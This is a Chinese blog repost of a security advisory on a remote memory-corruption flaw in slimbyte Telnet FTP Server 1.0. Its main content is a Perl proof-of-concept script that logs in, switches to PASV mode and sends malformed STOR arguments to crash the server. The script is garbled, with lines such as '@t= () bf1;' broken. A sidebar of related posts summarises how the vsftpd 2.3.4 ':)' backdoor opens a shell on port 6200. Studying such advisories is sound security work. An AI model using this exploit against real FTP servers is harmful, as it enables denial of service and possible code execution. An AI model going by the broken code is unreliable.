linux ftp pasv s 0,Telnet FTP Server 'PASV'命令远程内存破坏漏洞

最新推荐文章于 2023-06-09 12:47:13 发布
最新推荐文章于 2023-06-09 12:47:13 发布
阅读量186 收藏
点赞数
文章标签: linux ftp pasv s 0

发布日期:2012-07-16

更新日期:2012-07-17

受影响系统:

slimbyte Telnet FTP Server 1.0 build(1.218)

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 54462

Telnet是远程登陆FTP服务器。

Telnet FTP Server 1.0 build(1.218)在实现上存在内存破坏漏洞,攻击者可利用此漏洞在受影响应用中执行任意代码。

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

coolkaveh ()提供了如下测试方法:

# Exploit Title: Telnet Ftp Server <= Memory Corruption PoC

# crash:http://img40.imageshack.us/img40/595/ftpqm.jpg

# Date: July 7, 2012

# Author: coolkaveh

# coolkaveh () rocketmail com

# https://twitter.com/coolkaveh

# Vendor Homepage: http://www.slimbyte.sufx.net/

# also download link available at : http://telnet-ftp-server.en.softonic.com/

# Version: 1.0  build(1.218)

# Tested on: windows 7 SP1

#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# Crappy Telnet Ftp Server Memory Corruption PoC

#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#!/usr/bin/perl -w

use IO::Socket;

use Thread;

$|=1;

$host=shift;

$port=shift || "21";

if(!defined($host)){

print("usage: $0 \$host [\$port]\n");

exit(0);

}

$check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);

if(defined $check_first){

print "$host -> $port is alive.\n";

$check_first->close;

}else{

die("$host -> $port is closed!\n");

}

@bf1=(

'A'x5,

);

@bf2=(

'!)!)',

);

@bf3=(

'0',

);

@t= () bf1;

push(@t, @bf2);

push(@t, @bf3);

sub check(){

#Thread->self->detach;

$sock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);

if(defined $sock){

#print "$host -> $port is alive.\n";

undef($content_tmp);

$sock->recv($content_tmp,100,0);

if(length($content_tmp)>0){

$sock->close;

return 1;

}else{

$sock->close;

return 0;

}

}else{

#print("$host -> $port is closed!\n");

return 0;

}

}

#set PASV Mode send Socket

sub send_sock($){

$send_port_num=shift;

Thread->self->detach;

$send_sock_tmp=IO::Socket::INET->new(PeerAddr=>$host,

PeerPort=>$send_port_num, Proto=>'tcp', Timeout=>30);

if(defined($send_sock_tmp)){

$send_sock_tmp->recv($mem,100,0);

print "$mem\n";

$mem=0;

$send_sock_tmp->close;

undef($send_port_num);

return 1;

}else{

undef($send_port_num);

return 0;

}

}

print "Please enter the real username: ";

$real_username=;

chop($real_username);

print "Please enter the real password: ";

$real_password=;

chop($real_password);

@cm=(

'STOR',

'STOR',

);

$sock3=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port,

Proto=>'tcp', Timeout=>30);

if(defined($sock3)){

$sock3->recv($content, 100, 0);

print "$content\n";

sleep(2);

$sock3->send("USER "."$real_username\r\n", 0);

sleep(2);

$sock3->recv($content, 100, 0);

print "$content\n";

sleep(2);

$sock3->send("PASS "."$real_password\r\n", 0);

sleep(2);

$sock3->recv($content, 100, 0);

print "$content\n";

sleep(2);

if($content=~m/^230/){

$sock3->close;

}else{

$sock3->close;

die("Username or Password is wrong!\n");

}

}else{

die "$host -> $port is closed!\n";

}

L_V_J: undef($cmd);

C_L: foreach $cmd (@cm){

foreach $poc (@t){

LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host,

PeerPort=>$port, Proto=>'tcp', Timeout=>30);

if(defined($sock4)){

$sock4->recv($content, 100, 0);

print "$content\n";

sleep(2);

$sock4->send("USER "."$real_username\r\n", 0);

sleep(2);

$sock4->recv($content, 100, 0);

print "$content\n";

sleep(2);

$sock4->send("PASS "."$real_password\r\n", 0);

sleep(2);

$sock4->recv($content, 100, 0);

print "$content\n";

sleep(2);

if(($cmd eq 'STOR')){

$sock4->send("PASV\r\n", 0);

sleep(2);

$sock4->recv($content, 100, 0);

print "$content\n";

sleep(2);

if($content=~m/\((.*),(.*),(.*),(.*),(.*),(.*)\)/){

$send_port=$5*256+$6;

}

}

}

$sock4->send("$cmd"." "."$poc\r\n", 0);

Thread->new(\&send_sock,$send_port);

$sock4->send("$cmd"." "."$poc\r\n", 0);

sleep(2);

$sock4->recv($content, 100, 0);

$thread3=Thread->new(\&check);

undef($thread3);

$sock4->send("QUIT\r\n", 0);

}

}

建议:

--------------------------------------------------------------------------------

厂商补丁:

slimbyte

--------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

0b1331709591d260c1c78e86d0c51c18.png

weixin_39869959
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FTP服务器漏洞
qq_35266419的博客
10-10 2894
题目 目标系统通过Serv-U搭建了一个FTP服务。请尝试利用软件的漏洞获取目标服务器系统的FLAG.txt文件内的flag值并提交。 题目分析 1.FTP服务器 (1)定义:FTP服务器(File Transfer Protocol Server)是在互联网上提供文件存储和访问服务的计算机,它们依照FTP协议提供服务。 FTP是File Transfer Protocol(文件传输协议)。顾名思...
漏洞预警:FTP曝严重远程执行漏洞,影响多个版本Linux(附检测脚本)
weixin_34344403的博客
06-02 541
10月28日,一份公开的邮件中曝出FTP远程执行命令漏洞漏洞影响到的Linux系统包括:Fedora, Debian, NetBSD, FreeBSD, OpenBSD, 甚至影响到了苹果的OS X操作系统的最新版本Yosemite 10.10。 NetBSD的一位开发人员(Jared McNeill)证实了这个漏洞可已通过tnftp让WEB服务器远程...
FTP-利用FTP后门漏洞
Myu_wzy的博客
09-24 827
一、实验原理 vsftpd手工触发漏洞: 当进行FTP认证时,如果用户名USER中包含" :) ",那么直接就触发监听6200端口的连接的shell 二、实验环境 目标主机:Metasploit2虚拟机 192.168.20.143 攻击主机: Kali2虚拟机 192.168.20.133 三、实验过程 先用nc连接靶机,并在进行FTP认证时,用户名包含" :) " 此时靶机的6200端口已经开启 由于nmap进行自动扫描时,默认不会扫描6200端口,所以需要我们手动扫描6.
vsftp报错425 Failed to establish connection
weixin_33979745的博客
11-12 1585
转自http://blog.sina.com.cn/s/blog_4da051a60101c8ny.html vsftp:425failedtoestablishconnection解决办法 错误:425 Failed to establish connection. 这时候,可以在ftp下使用命令:quote PASV 试试用以...
6-1漏洞利用-FTP漏洞利用
山兔的博客
06-30 4029
文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。FTP使用21号端口。FTP在传输时,需要对应的用户用户分类:1、Real用户管理者在管理FTP服务器,为每一个用户创建对应名称的real用户或者是它有自己名称的用户,我们用户登录FTP服务器时,使用的是real用户的账号密码,这个时候,我们登录只能查看自己所在文件夹的内容,不能查看其它文件夹2、Administrator管理员登录之后,
ftp.zip_ftp_linux c ftp_linux ftp
09-21
根据FTP工作模式,客户端可能需要设置PORT或PASV命令,然后打开一个新的socket连接进行数据传输。 5. 关闭连接:完成操作后,使用close()函数关闭控制连接和数据连接。 为了实现更高级的FTP功能,例如处理多线程、...
Arm-Linux下使用的ftp服务和telnet服务1
11-07
本主题将深入探讨如何在Arm-Linux环境下搭建和使用FTP(File Transfer Protocol)和TELNET服务,这两个服务都是远程访问和文件传输的基础工具。 FTP服务允许用户通过网络在不同的计算机之间上传和下载文件,而...
Linux环境下socket编程,实现简单的FTP上传下载功能
05-22
2. **测试与调试**:使用telnetFTP客户端工具进行交互测试,检查命令响应和文件传输的正确性。 通过以上步骤,你可以构建一个基本的FTP服务器和客户端,实现文件的上传和下载功能。然而,实际的FTP系统可能还需要...
ftp&ftps使用问题总结.doc
05-05
Linux 系统中,可以使用 ftp 命令连接 FTP 服务器,例如使用命令 "ftp> open xx.xx.xx.xx 9501" 连接 FTP 服务器。 在 Filezilla 客户端中,可以使用被动模式连接 FTP 服务器,例如使用命令 "open -p 21 xx.xx....
FTP协议标准命令.pdf
12-15
控制连接用于在客户端和服务器之间交换命令和响应,类似于TELNET协议,但大部分FTP控制帧是ASCII文本。FTP命令和消息构成了这个交互过程,命令用于指示服务器执行特定操作,如登录、改变目录、上传或下载文件等,而...
vsftp3.0.4适用于el7(centos7.x),规避3.0.2版本的漏洞
03-01
1) 上传包到服务器安装路径 vsftpd-v3.0.4-centos7.zip 2) 解压: unzip vsftpd-v3.0.4-centos7.zip 3) 备份配置文件: cp /etc/vsftpd/vsftpd.conf /etc/vsftpd/vsftpd.conf.bak 4) 如果运行了vsftpd,则先停止: systemctl stop vsftpd 5) 安装升级vsftpd 3.0.4 rpm -Uvh vsftpd-3.0.4-1.el7.x86_64.rpm rpm -Uvh vsftpd-sysvinit-3.0.4-1.el7.x86_64.rpm 6) 启动vsftpd: systemctl start vsftpd 7) 验证版本信息: vsftpd –v 8) 验证服务可用 使用SSH工具,可以使用ftp协议访问 或者在文件中,外部系统正常的往系统内写入文件
FTP协议简单分析既历史漏洞介绍
南迪叶先森
06-30 1261
来源:https://www.freebuf.com/vuls/272975.html 话说在前面 节日在家无聊看完了kali linux2这本书,对书中一些知识比较感兴趣,于是才有了这篇文章。 协议介绍 FTP(File Transfer Protocol)文件传输协议,在TCP/IP协议族中属于应用层协议运行于TCP协议之上是一种可靠的传输协议,主要功能用于实现用户间文件分发共享,以及网络管理者在进行设备版本升级、日志下载和配置保存等业务操作时,均会使用到FTP功能。ftp协议是采用C/S结构。也就.
vsftpd实现基于SSL的FTPS
u014644574的博客
07-21 4589
FTP:是一个用于在计算机网络上在客户端和服务器之间进行文件传输的应用层协议。 FTPS:是一种对常用的文件传输协议(FTP)添加传输层安全(TLS)和安全套接层(SSL)加密协议支持的扩展协议。 SFTP:是一种数据流(英语:Data stream)连线,提供文件访问、传输和管理功能的网络传输协议,即SSH文件传输协议。 vsftpd:是一个类Unix系统以及Linux上的FTP服务器软件。 1、查看自己服务器有没有安装vsftpd ...
漏洞利用 --- VSFTPD 2.3.4 后门
最新发布
weixin_62443409的博客
06-09 9227
对VSFTPD 2.3.4 的攻击就是通过向21端口发送一个特定字节的序列来触发恶意的vsf_sysutil_extra()函数。一旦成功执行,就会在系统的6200端口打开一个后门,从而进行利用。
vsftpd配置PASV模式下指定端口范围,以便配置防火墙
热门推荐
互联网-从零开始
11-13 3万+
什么叫做PASV mode(被动模式传送)?他是如何工作的? FTP的连接一般是有两个连接的,一个是客户程和服务器传输命令的,另一个是数据传送的连接。FTP服务程序一般会支持两种不同的模式,一种是Port模式,一种是Passive模式(Pasv Mode),我先说说这两种不同模式连接方式的分别。 先假设客户端为C,服务端为S. Port模式: 当客户端C向服务端S连接后,使
telnet执行FTP交互
nowhere_的专栏
04-04 2万+
创建FTP服务器以及用telnet模拟FTP交互过程
FTP、TFTPTelnet(HCIA)
qq_45022073的博客
06-16 1232
FTP、TFTPTelnet(HCIA)
FtpServer PASV
06-07
FtpServer中,您可以通过修改FTP服务器的配置文件来启用或禁用PASV模式。具体来说,您可以在配置文件中找到“data-connection.mode”参数,将其设置为“passive”以启用PASV模式,或将其设置为“active”以启用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值